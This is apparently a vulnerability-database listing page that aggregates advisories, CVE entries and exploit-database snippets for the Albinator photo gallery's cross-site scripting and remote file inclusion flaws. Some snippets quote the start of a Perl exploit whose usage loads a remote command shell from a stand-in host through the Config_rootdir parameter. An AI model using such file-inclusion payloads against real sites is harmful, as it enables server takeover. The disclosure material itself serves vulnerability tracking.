EUVD-2006-2182

Malware in sbrugna...

EUVD-2006-2183

Malware in sbrugna...

Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit

No description provided by source...

Albinator 2.0.8 showpic.php preloadSlideShow Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...

Albinator 2.0.8 dlisting.php cid Parameter XSS

No description provided by source. source: http://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code...

[SA19952] Albinator File Inclusion and Cross-Site Scripting Vulnerabilities

TITLE: Albinator File Inclusion and Cross-Site Scripting Vulnerabilities SECUNIA ADVISORY ID: SA19952 VERIFY ADVISORY: http://secunia.com/advisories/19952/ CRITICAL: Highly critical IMPACT: Cross Site Scripting, System access WHERE: From remote REVISION: 1.1 originally posted 2006-05-04 SOFTWARE:...

AlbinatorPro208.txt

=========================================================================== XOR Crew :: Security Advisory 0day GIVE AWAY date? 2/20/2006 =========================================================================== Albinator Pro = 2.0.8 - Remote Command Execution Vulnerability...

CVE-2006-2181

Multiple cross-site scripting XSS vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 cid parameter to dlisting.php or 2 preloadSlideShow parameter to showpic.php...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 cid parameter to dlisting.php or 2 preloadSlideShow parameter to showpic.php...

CVE-2006-2182

CVE-2006-2182 describes multiple PHP remote file inclusion vulnerabilities in albinator 2.0.8 and earlier, affecting the scripts eday.php, eshow.php, and forgot.php. The root cause is that the Config_rootdir parameter can be supplied via a URL, allowing remote attackers to execute arbitrary PHP c...

CVE-2006-2181

CVE-2006-2181: Multiple cross-site scripting (XSS) vulnerabilities affect Albinator 2.0.8 and earlier. The issues allow remote attackers to inject arbitrary web script or HTML via (1) the cid parameter in dlisting.php, and (2) the preloadSlideShow parameter in showpic.php. The description does no...

CVE-2006-2182

Multiple PHP remote file inclusion vulnerabilities in 1 eday.php, 2 eshow.php, or 3 forgot.php in albinator 2.0.8 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the Configrootdir parameter...

CVE-2006-2181

Multiple cross-site scripting XSS vulnerabilities in Albinator 2.0.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 cid parameter to dlisting.php or 2 preloadSlideShow parameter to showpic.php...

[Full-disclosure] [XPA] - Albinator Pro &lt;= 2.0.8 - Remote Command Execution Vulnerability

=========================================================================== XOR Crew :: Security Advisory 0day GIVE AWAY date? 2/20/2006 =========================================================================== Albinator Pro = 2.0.8 - Remote Command Execution Vulnerability...

Albinator 2.0.6 - &#039;Config_rootdir&#039; Remote File Inclusion

!/usr/bin/perl Albinator Multiple Parameter File Inclusion Bug discovered by VietMafia and r0t code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Pat...

Albinator &lt;= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit

No description provided by source. !/usr/bin/perl Albinator Multiple Parameter File Inclusion Bug discovered by VietMafia and r0t code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click = 2.3.8 Remote File Inclusion exploit Dork:"powered by Albinator " usage: perl wb.pl target cmd shell...

Albinator 2.0.6 - Config_rootdir Remote File Inclusion

Albinator 2.0.6 - Configrootdir Remote File Inclusion !/usr/bin/perl Albinator Multiple Parameter File Inclusion Bug discovered by VietMafia and r0t code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example:...

albinator &lt;= 2.0.8 Remote File Inclusion Vuln and XSS

albinator = 2.0.8 Remote File Inclusion Vuln and XSS Vuln. discovered by :VietMafia & r0t Pridels Sec Crew Date: 3 may 2006 vendor:http://www.albinator.com/ affected versions:2.8 and prior orginal advisory:http://pridels.blogspot.com/2006/05/albinator-208-remote-file-inclusion.html Vuln...

Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit

Exploit for unknown platform in category web applications ================================================================= Albinator perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd =...

Albinator 2.0.8 - showpic.php?preloadSlideShow Cross-Site Scripting

Albinator 2.0.8 - showpic.php?preloadSlideShow Cross-Site Scripting source: https://www.securityfocus.com/bid/17826/info Albinator is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issue...